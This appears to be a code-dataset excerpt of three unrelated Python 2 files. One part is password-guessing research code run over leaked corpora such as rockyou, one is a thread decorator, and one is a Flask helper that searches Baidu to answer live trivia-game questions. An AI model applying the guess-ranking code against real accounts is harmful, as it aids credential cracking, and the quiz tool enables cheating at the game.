print "Done {}".format(i)
def run_all(offline=False):
pwleaks = ["/home/ubuntu/passwords/rockyou-withcount.txt.bz2",
"/home/ubuntu/passwords/myspace-withcount.txt.bz2",
"/home/ubuntu/passwords/phpbb-withcount.txt.bz2"][:1]
processes = []
q = Q
for fname in pwleaks:
# processes.append(Process(target=compute_guesses_using_typodist, args=(fname, q, 5, False, offline)))
processes.append(Process(target=compute_guesses_using_typodist, args=(fname, q, CACHE_SIZE, True, offline)))
for p in processes: p.start()
# for p in processes: p.join()
return
if __name__ == '__main__':
import sys
# create_pw_db_(sys.argv[1])
# approx_guesses(sys.argv[1], 1000)
# greedy_maxcoverage_heap(sys.argv[1], 1000)
set_globals(settings_i=0)
run_all()
set_globals(settings_i=1)
run_all()
set_globals(settings_i=2)
run_all(offline=True)
set_globals(settings_i=3)
run_all(offline=True)
# set_globals(settings_i=1)
# fname = sys.argv[1]
# create_pw_nh_graph(fname)
# print("Done creating all the graphs")
# # verify(fname)
# q = Q
# process = {
# 'p_all': Process(target=compute_guesses_all, args=(fname, q)),
# 'p_random': Process(target=compute_guesses_random, args=(fname, q)),
# 'p_typodist': Process(target=compute_guesses_using_typodist, args=(fname, q, 5, False)),
# 'p_topk': Process(target=compute_guesses_using_typodist, args=(fname, q, 5, True))
# }
# process['p_typodist'].start()
# process['p_topk'].start()
# compute_guesses_using_typodist(fname, q, 5, True, offline=True)
# compute_guesses_using_typodist(fname, q, 10, False)
# process['p_typodist'].join()
# process['p_all'].join()
# for pname, proc in process.items():
# print("\n*** {} ***\n".format(pname.upper()))
# proc.start()
# for pname, proc in process.items():
# proc.join()
# pass
|
decorators.py
|
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
main.py
|
# -*- coding: UTF-8 -*-
import commands
import sys
from flask import Flask, request
import methods
from threading import Thread
import multiprocessing
import operator
import time
from argparse import ArgumentParser
from multiprocessing import Event
from multiprocessing import Pipe
from terminaltables import AsciiTable
from config import enable_chrome
from core.baiduzhidao import baidu_count
from core.check_words import parse_false
from core.chrome_search import run_browser
reload(sys)
sys.setdefaultencoding('utf-8')
app = Flask(__name__)
# @Author : Skye
# @Time : 2018/1/8 20:38
# @desc : 答题闯关辅助,百度搜索
def parse_args():
parser = ArgumentParser(description="Million Hero Assistant")
parser.add_argument(
"-t", "--timeout",
type=int,
default=5,
help="default http request timeout"
)
return parser.parse_args()
def parse_question_and_answer(title, answers):
# question = ""
# start = 0
# for i, keyword in enumerate(text_list):
# question += keyword
# if "?" in keyword:
# start = i + 1
# break
real_question = title.split(".")[-1]
question, true_flag = parse_false(real_question)
return true_flag, real_question, question, answers
def pre_process_question(keyword):
"""
strip charactor and strip ?
:param question:
:return:
"""
for char, repl in [("“", ""), ("”", ""), ("?", "")]:
keyword = keyword.replace(char, repl)
keyword = keyword.split(r".")[-1]
keywords = keyword.split(" ")
keyword = "".join([e.strip("\r\n") for e in keywords if e])
return keyword
def __inner_job(title, answers):
start = time.time()
true_flag, real_question, question, answers = parse_question_and_answer(title, answers)
print('-' * 72)
print(real_question)
print('-' * 72)
print("\n".join(answers))
# notice browser
if enable_chrome:
writer.send(question)
noticer.set()
search_question = pre_process_question(question)
summary = baidu_count(search_question, answers, timeout=timeout)
summary_li = sorted(
summary.items(), key=operator.itemgetter(1), reverse=True)
data = [("选项", "同比")]
for a, w in summary_li:
data.append((a, w))
table = AsciiTable(data)
print(table.table)
print("*" * 72)
if true_flag:
print "肯定回答(**):%s" % summary_li[0][0]
print "否定回答( ):%s " % summary_li[-1][0]
else:
print "肯定回答( ): %s" % summary_li[0][0]
print "否定回答(**): %s" % summary_li[-1][0]
print("*" * 72)
end = time.time()
print("use {0} 秒".format(end - start))
# save_screen(
# directory=data_directory
# )
def run_command(cmd):
status, output = commands.getstatusoutput(cmd)
return status, output
@app.route('/question', methods=['POST'])
def questionAndAnswer():
data = request.json
title = data["title"]
answers = data["answer"]
__inner_job(title, answers)
m2 = Thread(methods.run_algorithm(1, title, answers))
m3 = Thread(methods.run_algorithm(2, title, answers))
m2.start()
m3.start()
return ""
if __name__ == '__main__':
args = parse_args()
timeout = args.timeout
if enable_chrome:
closer = Event()
noticer = Event()
closer.clear()
noticer.clear()
reader, writer = Pipe()
browser_daemon = multiprocessing.Process(
target=run_browser, args=(closer, noticer, reader,))
browser_daemon.daemon = True
browser_daemon.start()
app.run(host="192.168.31.211", port=5000)
if enable_chrome:
reader.close()
writer.close()
closer.set()
time.sleep(3)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.